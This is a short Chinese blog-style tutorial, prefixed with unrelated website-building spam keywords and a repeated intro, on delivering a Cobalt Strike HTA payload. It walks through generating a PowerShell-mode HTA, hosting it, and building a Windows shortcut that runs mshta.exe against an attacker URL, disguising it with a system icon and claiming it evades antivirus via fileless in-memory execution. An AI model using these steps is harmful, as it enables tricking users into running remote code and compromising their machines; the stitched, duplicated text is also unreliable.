租赁网站空间更换怎么做,方舟网站建设,石家庄做公司网站,连云港企业建站 网站免责声明:本文仅做技术交流与学习... 目录
CS:
HTA文档 文件托管
借助mshta.exe突破
本地生成lnk快捷方式:
非系统图标路径不同问题:
关于lnk的上线问题: CS:
HTA文档 配置监听器 有效载荷----HTA文档---选择监听器---选择powershell模式---- 默认生成一… 免责声明:本文仅做技术交流与学习... 目录
CS:
HTA文档 文件托管
借助mshta.exe突破
本地生成lnk快捷方式:
非系统图标路径不同问题:
关于lnk的上线问题: CS:
HTA文档 配置监听器 有效载荷----HTA文档---选择监听器---选择powershell模式---- 默认生成一个evil.hta文件到桌面吧~ 文件托管 站点管理---文档托管 ----记录一下生成的网址--- http://IP:83/download/file.ext 借助mshta.exe突破 windows中的mshta,用于执行hta文件. mshta.exe是微软Windows操作系统相关程序英文全称Microsoft HTML Application可翻译为微软超文本标记语言应用用于执行.HTA文件. 本地生成lnk快捷方式: C:\Windows\System32\mshta.exe http://IP:83/download/file.ext 名字随便取好吧~ 生成之后,右键属性,更改图标等等 windows系统自带的图标目录: C:\Windows\System32\shell32.dll 选一个吧,然后就OK了,执行---上线. 非系统图标路径不同问题: 所以还是最好用系统图标. 关于lnk的上线问题: 1-就是个快捷方式----没毒 C:\Windows\System32\mshta.exe http://IP:83/download/file.ext 2-调用了系统的mshata程序----需要允许通过 3-文件为恶意文件被拦截---阻止也会上线----无文件落地,因为进入内存了!!!
